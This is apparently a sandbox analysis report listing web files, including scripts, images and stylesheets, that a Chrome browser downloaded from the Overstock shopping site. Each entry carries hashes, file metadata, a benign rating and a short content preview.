                                                                                                                                                                                    SHA-512:DB673798EA8D75A153ADCF2EADFFF0C21184CB6862F3A6D642948C3AB1442E1FBF64F217D5761BC7F5207355C065518ED6B15AF4E1DED19DD72A7F090FF5D147
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function () {. const { currentScript } = document;. const script =. new URL(currentScript.src) || new URL(currentScript.getAttribute("src"));.. const appId = script.searchParams.get("appId");. const environment = script.searchParams.get("environment");.. const srcUrls = {. local: "http://localhost:3005/dist/tc-plugins.es.js", // local dev server URL defined in vite.config.js. staging:. "https://unpkg.com/tapcart-capture-kit@staging/dist/tc-plugins.es.js",. production:. "https://unpkg.com/tapcart-capture-kit@production/dist/tc-plugins.es.js",. };. const srcUrl = srcUrls[environment] || srcUrls.production;.. window["tapcartParams"] = { appId, environment };.. // Create a new script element with type module. const moduleScript = document.createElement("script");. moduleScript.type = "module";. moduleScript.src = srcUrl;. document.head.appendChild(moduleScript);.. moduleScript.onerror = function () {. console.error("The script failed to load.");. };
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1922
                                                                                                                                                                                    Entropy (8bit):7.056347900667456
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:HIl/XflbzwXrgzfZQfUkFeVIPwaFHicEmIv8j6+:HIl/XJzwEzKcSvPpE7mXN
                                                                                                                                                                                    MD5:AC2972B0F4325A887B9F6EBAED124732
                                                                                                                                                                                    SHA1:4CD083C68654115F783D01FAACEEE5364BF18A8F
                                                                                                                                                                                    SHA-256:CFF5F91044E5FB70EB3757317B26D711E7F9BB79E10F8E39D4D3B0413AF1916A
                                                                                                                                                                                    SHA-512:118BAB7917090A0BC0A6A8EB9E45182C69930F58430B451C77CE832536843F8D5648E5AB4783A1E547986E92CC78FD63A92395E32D3FC8AB0C8ED4AAD9257BB5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_49bccb4b-5f87-4a50-8461-b3e0012830fa.jpg?v=1729322906&width=80
                                                                                                                                                                                    Preview:RIFFz...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P....*P.P.>-..B...f.f..bY.41"..X.1..x<.y..H..|.]a.......?.../......._...M..C..<.............Z.f..............*e*..&O....[)........D..&.UFe2./n....y.{m......6K>.....@i..B~3....Q.5...i..z.d'p:e.=.8.'.:.....=Z...9.....+'.....7!.`.yw.....uG....d..K%..~X.N.....%.......=n....s+)G.. ...P...0yW.3....^$~h:..<S..,.....2.Xe...om.."......I..!...`..y........I..{.......5q./..>...A}.xa/.c...3.p+.y....K..FM.z....>_...;C....u.....k...5..3,........n.r..]..1....[.-wDj\jw..F.S....M ...d.wp.E.K.~...x.4k....:.J.E.....s.;.t|...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1471
                                                                                                                                                                                    Entropy (8bit):4.5475358436836135
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:t3JfDut5QlA7k6/+ggshwmTcaQlA7k6/+ggshwmTcGWQWytgL/FnXfHR0prstdk7:3flArHgxtlArHgxGWQWytgL/F/Rz4
                                                                                                                                                                                    MD5:F3DDA33BF5FB24583534BD41E758FB25
                                                                                                                                                                                    SHA1:2FD3D57ED95BCD3D004D5F94BB7431C0BB7180A8
                                                                                                                                                                                    SHA-256:64BA853ACB4A3F8358656E2AFBEA7A40B1832B4F902BA082B61DD9A2B555D09B
                                                                                                                                                                                    SHA-512:19EED73C1FA43632D2F57EA650FBF68450D22AA18E5A08287F5835303B29084C450F7E80C08AE9451B67F52072EE2E8BED156CB4CE7C0168EAD1AE519A58A3CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/star-25.svg
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_393_920)">.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<p
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (983)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):984
                                                                                                                                                                                    Entropy (8bit):5.407814902696932
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:3Cs3Lod95Z7ISHRMLyCVkdbQPvfoNFdrLZz+ZfydU:ys3sdxLxMLyCu9IYXdJz+oU
                                                                                                                                                                                    MD5:06D5A5636776CF41EC4D580374B5337A
                                                                                                                                                                                    SHA1:29F433E846A5D06C302E79C3D68CA8650F063E19
                                                                                                                                                                                    SHA-256:1AA13FB2F8FA0C86FD058764FE3C5BFB2D116DD84309601D5FD58685CF3801E3
                                                                                                                                                                                    SHA-512:78C35C80EC0D33220025BFA2BC911B3D23731F7BF56B6ECFDF7EF35F909127A3FC5015B22D0F8692BA08964CBB9786210AB58CC6D70A1F872E31D843BA6E8AE2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/LegacyVaultedShippingMethods.CLlWtWZU.js
                                                                                                                                                                                    Preview:import{c as E,u as y,C as T,b as P,d as f,q as v,h as I,e as _,f as M,g as b,i as C,y as m,p as L,a as o,I as S,P as k,S as A}from"./app.DfgMZONA.js";import{R as x}from"./Rollup.B0QeYKuB.js";import{u as D}from"./SubscriptionPriceBreakdown.CxrCP-xw.js";const N=E(null);function B(){const e=y(T),i=P(),[t]=f(N),s=v(a=>t?.setShopPay(a),[t]);return{setEditorShopPay:i&&e&&t?s:void 0}}function R(){const[e,i]=I(void 0),t=_(),{promiseText:s,loading:a}=M(),r=D(),p=b(),{loading:d,value:n}=C();m(()=>{i(Date.now())},[]),m(()=>{if(!(d||!n)&&e){const l=Date.now(),c=l-e,u=n[0]?.promiseProviderApiClientId;if(u){const h=L(u);r(c,l,Number(h)),p(c,Number(h)),i(void 0)}}},[d,n,e,r,p]);const g=o(S,{children:[k,o(A,{})]});return o(S,{children:o(x,{id:"buyWithPrimeShippingMethods",label:t("shipping.shipping_method_title","Shipping method"),summary:a?g:s})})}const V=Object.freeze(Object.defineProperty({__proto__:null,default:R},Symbol.toStringTag,{value:"Module"}));export{V as L,N as e,B as u};.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (20803)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):249029
                                                                                                                                                                                    Entropy (8bit):5.417862003761508
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:p8fVpsy2MPSLXHljPlo20Q6zsDdomIqiOdi9:pKVpKXHlj950ODdomji9
                                                                                                                                                                                    MD5:18C1F01E1E3A152F49FD0D07502F75D5
                                                                                                                                                                                    SHA1:8907076A7DC03C964A331D320C1074E44683F933
                                                                                                                                                                                    SHA-256:F6110C0B179196505B95F11372F577F4A9F1FDB2976A915C891591FD2C51054A
                                                                                                                                                                                    SHA-512:2C75FFF0F4D632528EFB9A9FFB088C590B043AB76A61BDE997254C534DBFA40426BA9C0F8E4A5925A588E7D4AF871E0D9873616E2BF20F954C067F3AB9CAE7BD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview://tealium universal tag - utag.loader ut4.0.202409301659, Copyright 2024 Tealium.com Inc. All Rights Reserved..var utag_condload=false;window.__tealium_twc_switch=false;if(typeof utag=="undefined"&&!utag_condload){var utag={id:"overstock.main",o:{},sender:{},send:{},rpt:{ts:{a:new Date()}},dbi:[],db_log:[],loader:{q:[],lc:0,f:{},p:0,ol:0,wq:[],lq:[],bq:{},bk:{},rf:0,ri:0,rp:0,rq:[],ready_q:[],sendq:{"pending":0},run_ready_q:function(){for(var i=0;i<utag.loader.ready_q.length;i++){utag.DB("READY_Q:"+i);try{utag.loader.ready_q[i]()}catch(e){utag.DB(e)};}},lh:function(a,b,c){a=""+location.hostname;b=a.split(".");c=(/\.co\.|\.com\.|\.org\.|\.edu\.|\.net\.|\.asn\.|\...\.jp$/.test(a))?3:2;return b.splice(b.length-c,c).join(".");},WQ:function(a,b,c,d,g){utag.DB('WQ:'+utag.loader.wq.length);try{if(utag.udoname&&utag.udoname.indexOf(".")<0){utag.ut.merge(utag.data,window[utag.udoname],0);}.if(utag.cfg.load_rules_at_wait){utag.handler.LR(utag.data);}}catch(e){utag.DB(e)};d=0;g=[];for(a=0;a<utag.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2159
                                                                                                                                                                                    Entropy (8bit):6.756883056129179
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:rGP/jGgvIl/XflAWVtVAJO4q9ExLbnsH4VJLlJz5Wx4Vji:rGzGgvIl/XuuaJO4quxvswl95lji
                                                                                                                                                                                    MD5:A43B6039E0312BBFDDAE51F814F1173A
                                                                                                                                                                                    SHA1:24F2D88A9FAE4B5D14BBC8820799001809C69CBE
                                                                                                                                                                                    SHA-256:56480CA43740DA95A608E6EEF73725392FED66045B6D1CF251E26DFAF7B4BCA0
                                                                                                                                                                                    SHA-512:4A004CDEB8FB39FA330B29DC800CC4F6B26D47813A6E53CE6769A59FF095D8D945E9C9245CB79A267170E8572C1442887898851650F51D17799CA706F94FAD5F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_fc02f2b6-fc13-4e36-ae4d-738ace5c9dce.jpg?v=1729323103&width=80
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe.......P...P....pixi............ipma...................iref........cdsc..........mdat........d...B2.......1......b(.....{7..G.O..tn...!..L}.3;..sV^;.a....&Md...ztf.....H..Z#...j.w.V..9`4.I..1O....R..|IM.h(.,.i`..:.Wm.{...'..q.~.h.'.pe."1..UFv.].]d.'...Eg.I.c.'.A.w.....,.M...."aD.|C|..s...S;W9yV...X....l..8.#......x.`....?7..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x366, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):53442
                                                                                                                                                                                    Entropy (8bit):7.95021670273796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:9x748MVGUc4tYRCNQdkdjLul8mWIy8ZPkFh0nj:9xzPSKCQkdu2mJuej
                                                                                                                                                                                    MD5:006F0F314A17897F0B7B518A5C552D45
                                                                                                                                                                                    SHA1:672742D83830CD77D30422F4F40F8FBA4F14B262
                                                                                                                                                                                    SHA-256:733A6AD023438E5725DCDEB6B97045CE19354D91F6189CD1C3643653B9311F9F
                                                                                                                                                                                    SHA-512:375D7C66F87E35721476D543EC58D98AB44014C6844028BB061E659017CB0472C913FEFF58454BA6F46237F65225F045B57D5B47E6719FD1F48404F825DC2834
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................n...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......n.............................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):116513
                                                                                                                                                                                    Entropy (8bit):5.34426438977711
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:eJuyfE/+IV8rKrXLlciGW+G2VTKAdRlAmKMaV9nrl80/SvKcAxAMQLxC1QLWHuC6:+DsxX+G2VTKAVtvKjWMp1iWu
                                                                                                                                                                                    MD5:F74D2C1D7F7B2041E00F0347C7D2D5F8
                                                                                                                                                                                    SHA1:ABE7F23DFC882240C6641B061A84AFF68FDEAB5D
                                                                                                                                                                                    SHA-256:A3C053D11506F3F1EF0795F89739C8A0F99E4E2D50FC05205B4EC0A818A32C57
                                                                                                                                                                                    SHA-512:EB4D8E401D7EEA9F625A04D3B1DEFD7856A5EC31ECE9B67A806924EFB34D4B3FE879C0900905F16012A2903E2533A0D9BD4B153C87918623ABF219B9C66D7E00
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/s/trekkie.storefront.a8ef5c2c4f1c6e0839c6b8857d0a2edb7d22d961.min.js
                                                                                                                                                                                    Preview:!function(){var e={1644:function(e,t){"use strict";function n(e,t,n){try{var i;r({error:e,context:t,shopId:o()||(null===(i=window.Shopify)||void 0===i?void 0:i.shop),notes:n})}catch(e){}}function o(){try{const e=document.getElementById("shopify-features").textContent;return JSON.parse(e).shopId}catch(e){return null}}function r(e){const t=new XMLHttpRequest;t.open("POST","https://notify.bugsnag.com/",!0),t.setRequestHeader("Content-Type","application/json"),t.setRequestHeader("Bugsnag-Api-Key","95ba910bcec4542ef2a0b64cd7ca666c"),t.setRequestHeader("Bugsnag-Payload-Version","5");const n=function(e){const t=(n=e.error).stackTrace||n.stack||n.description||n.name;var n;const[o,r]=(t||"unknown error").split("\n")[0].split(":");return JSON.stringify({payloadVersion:5,notifier:{name:"ConsentTrackingAPI",version:"latest",url:"-"},events:[{exceptions:[{errorClass:(o||"").trim(),message:(r||"").trim(),stacktrace:[{file:"consent-tracking-api.js",lineNumber:"1",method:t}],type:"browserjs"}],context
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2159), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2159
                                                                                                                                                                                    Entropy (8bit):5.187883475890047
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:6KLxP8Njis5O3sqw0TjnHuBAz3Cs0JFf2EwM5ccR5P/4hx95Ts7W:RVqjrTaqADCvFf2vsXvPAnL+W
                                                                                                                                                                                    MD5:5737D20E84D62E43284A5575D810A012
                                                                                                                                                                                    SHA1:0261F4E3A0CCD50821BC00B3C81040A2990ABCE0
                                                                                                                                                                                    SHA-256:7C37E17BFEB054B199C90965D335D1DA2455954BB849B754262C1BF2F98594F9
                                                                                                                                                                                    SHA-512:7C17F7335E0AEA6B2A0D0AE3F725187208EDEC9587DFAE1906D01D9B6ECCCD2F03DF67D8EE693DEDECC9C11DB2FBD34277D600A4D8D8981A088FACCB8B5B1B18
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function r(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function o(e){const t=100;window.setTimeout(function(){if(r()!==null&&r().getUser()){e()}else{o(e)}},t)}function s(e,o,n){fetch(e+".js").then(e=>e.json()).then(e=>{var t={id:e.id,title:e.title,price:e.price,vendor:e.vendor,images:e.images,shopify_storefront:n};r().logCustomEvent(o,t);r().requestImmediateDataFlush()})}function n(){const e=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-product-script")));const t=new URLSearchParams(e.search);return Object.fromEntries(t.entries())}function u(e){const t=e.lastIndexOf("/")+1;const o=e.indexOf("?")>0?e.indexOf("?"):e.length;return e.substring(t,o)}function c(e,t,o,n,r,i){productName=u(t);const c=JSON.parse(localStorage.getItem(o)||"{}");lastEventTimeForProduct=c[productNa
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):73999
                                                                                                                                                                                    Entropy (8bit):5.45922969241985
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIj:qYW2Pj5yO7t2ACRg8398ge6LVR
                                                                                                                                                                                    MD5:E086EB99F82EC44B680D257D5BE0B958
                                                                                                                                                                                    SHA1:CEBCFA97EC2A5AD846DC10B3828AB9CE52697131
                                                                                                                                                                                    SHA-256:EB0BF3DD6AE4822473C0AD32270225E33AC11805AFE695AB4493D1E6C3B2E34F
                                                                                                                                                                                    SHA-512:59BA14B284BCC8DA4226337B28B05F70D60204205AA937A3F58F6AACC470507DBCE40E7D5CE68A4FE512B203870D5FED7BB07AFC3209565E7713542DCB261C29
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-17006751@84/sandbox/modern/collections/furniture
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, original size modulo 2^32 185031
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):48577
                                                                                                                                                                                    Entropy (8bit):7.994725460592687
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:GU1OIgf9Z5Sup6dmR6D/KUTcp5L5F6m+LTEYkgnNbp7SS4draXFCP3F:GU1wlZ5Su8dmY/T85LSEYk0V72aa3F
                                                                                                                                                                                    MD5:C0704F84D3BBD0782BAE3274EC71DF96
                                                                                                                                                                                    SHA1:90DFD9CA26FC0F9639843D0C8BE6FF5303680942
                                                                                                                                                                                    SHA-256:AE3E7AE382B51ECBF613535BF8551250A30A7664BBC33F1B1ACF57A3EC381538
                                                                                                                                                                                    SHA-512:7FF55C43D8D165F8F1ED4767DC985FD971281BC23D6170E9093B418C0180E45AF0234646B71CFB4456CE45DBD03A1B1003B79AA7527FAA313676D9FD961DBDBF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.evgnet.com/beacon/c556855555573h9jz3n3n3p091552376/bbb_us/scripts/evergage.min.js
                                                                                                                                                                                    Preview:...........i{.F.0.........DQ..d..<.,.J...82'O.h..@.&H-.y~...^.X...d.{.;.."..^.....k.%m.b4.....9....77..<O.Y.&s>c.|.M.[+t..(w..6.o>.....7..f....Mlk?.f..d.>~.c;.X..G....C.^3*.y..6Kg..W.$[L.v6.oFy{.3.X.O#Y.#6..6.A.Z.6Os.......O9...[6...h..l6o.m{./....Ng....v...,..|>.E....l.V.....hO.k..=....k..7..<.w..UnG.?JlY.=.....eS>._._..,..WapS.l&... .$...e.q0.z......3.G..t..`.....b.p.S.....t..;l:M.l..J..V...kX".....~......d...'.......'.4..t...3......^.@&...p7.N.z8d..zb.s......4.;+.e~yOV.y2.pYa..z.m.. ..e..y@M=\. o.>..&.....]D.`...X..b...j...mnF..q...l.....x4...>b.y6... .......4.1Y....E..Z..-;!l..6...Yv..p...g3.....m.../.y[aF{...Y......c...".h.4Zc...+*.......Y..!O.py{.->.|..~`./...<67k]I@.....{z.#.Y.V^..-..........".. ....wg:...~.S..t..~..C&......G.2...Uc.i\..6.d.6.3,G...(%...C....K.0..>{............. ....\n..[.z2.,....o..X.I;D......../..!.H.IN1......5P;.w.G...D!._..?..k5.ocw......%..`D.C...D].z.^.l=..p.6....|.z......a..../.mC...APS...p......t.......Gp..z.6~..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):456599
                                                                                                                                                                                    Entropy (8bit):5.373039843710787
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:EZ3lY37vavSZea94/jXfG2a7tPTBB7NthgxtzbP+y3b66AP+vntozbHXH5pbo/bY:Eh29woj59
                                                                                                                                                                                    MD5:7290D3206A25D0C9B38B2FA246038ECD
                                                                                                                                                                                    SHA1:FB4E12DB24C9D0DDB7CD556A6533715E74962EC7
                                                                                                                                                                                    SHA-256:F929B9E192EBC87DCA227C0E891B55B5DB21345E31FF3232484055037315C59A
                                                                                                                                                                                    SHA-512:1378BA0728563DE7D3105E91B63FFC934E2A21FF3914BD22626B03EFB510B254668BD93B0DD290E45E19D2B8FE1B2D30124443220D50DAF42DA0159AD128B1AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/tagsSiteWide.f929b9e192ebc87dca227c0e891b55b5db21345e31ff3232484055037315c59a.js
                                                                                                                                                                                    Preview:(()=>{var e={598:(e,t,n)=>{var r="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:void 0!==n.g?n.g:"undefined"!=typeof self?self:{};var i,o,a=(i=function(e){(function(){!function(t,n){if(e.exports){var r=n();e.exports=r,e.exports.default=r}else if(t.appboy){var i,o=n();for(i in o)t.appboy[i]=o[i]}else t.appboy=n()}("undefined"!=typeof self?self:this,(function(){var t,n={};function i(e){var t=0;return function(){return t<e.length?{done:!1,value:e[t++]}:{done:!0}}}function o(e){var t="undefined"!=typeof Symbol&&Symbol.iterator&&e[Symbol.iterator];return t?t.call(e):{next:i(e)}}var a,s="function"==typeof Object.create?Object.create:function(e){function t(){}return t.prototype=e,new t},c="function"==typeof Object.defineProperties?Object.defineProperty:function(e,t,n){return e==Array.prototype||e==Object.prototype||(e[t]=n.value),e},u=function(e){e=["object"==typeof globalThis&&globalThis,e,"object"==typeof window&&window,"object"==typeof self&&self,"object"==type
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1332
                                                                                                                                                                                    Entropy (8bit):6.458275951337347
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:c5TCIl/X2YlXWI2PUvBFcF03fcghg5Va56LNgluUE9jAKonTigo:cIIl/Xfl9BuFs3ge6LNTAx3o
                                                                                                                                                                                    MD5:D9A69E5CA866E992AE0E9F23B0CE0797
                                                                                                                                                                                    SHA1:55752F4770CCD948B0F8684C7FA76D77F7A3D47A
                                                                                                                                                                                    SHA-256:6137805074D666AAF148759A9765CE7B79EDAF3D8CB44F3023B73E38337FABA1
                                                                                                                                                                                    SHA-512:CB9BD9E8DD73D1D4551932988DD708F006B77C31A590E13BE3EFA2E83E5AA9C0864350C7B9614B580ED1344525F4849B725BF7E658861B24BC4C8359BCC9838F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_d507b367-cd43-415a-97dd-a4750c02e4cb.jpg?v=1729325320&width=80
                                                                                                                                                                                    Preview:RIFF,...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.9.. ....i.W..<j...o;......W....~....b....o..s.k.....1...7.-...j.....@.C:.j*......':Q>.......?.\+........]..@.... .........kA.V.....?...i..V>+.P>F.....S....... .O....m.l..R.D.8 F...O..).h.s"l.P.X.7[f.....r....... .S..\..S...~..:rJ.l.6.GAb...>-Fjc..X..*$.Y...amv.........">y..T./.F..TH......P3.OZ.q...pv...o..J.c+TB.7}hg...[...P.o$2...`K.so..8.w...C.>...}g_)...j.. ..wl..n{..-....Th.o_.......x...^.....",U.g......_....=q...|...._.>..C..[...4...u.._t}].6.1^;...I...X..m_...d.3.........;.;\
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4347)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4453
                                                                                                                                                                                    Entropy (8bit):5.024297961259233
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:/aS/BKokIoRz3+IHY5dbzUonUoaUoEUX8:sokIoRCkobzUonUoaUon8
                                                                                                                                                                                    MD5:2019D2EF42EC405B8FE719E5E0201266
                                                                                                                                                                                    SHA1:0C2E687B8148FE29C8D2687288E7E1729B430346
                                                                                                                                                                                    SHA-256:6578BAF0D7B879DBB6952F20EC091EE05C85AFD5F1D349F1E5F7035FFE994040
                                                                                                                                                                                    SHA-512:DC6BCFC9D96645805BCD1A60BEAD53BA92DBB44FF28BF47A41043180BF15036A32E010A6D23BB50B6F7D08C8EE58C8F8DEEF36F39DF0EB068616D8079B5C88D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/os-search-results.css?v=93718395236406313381730157903
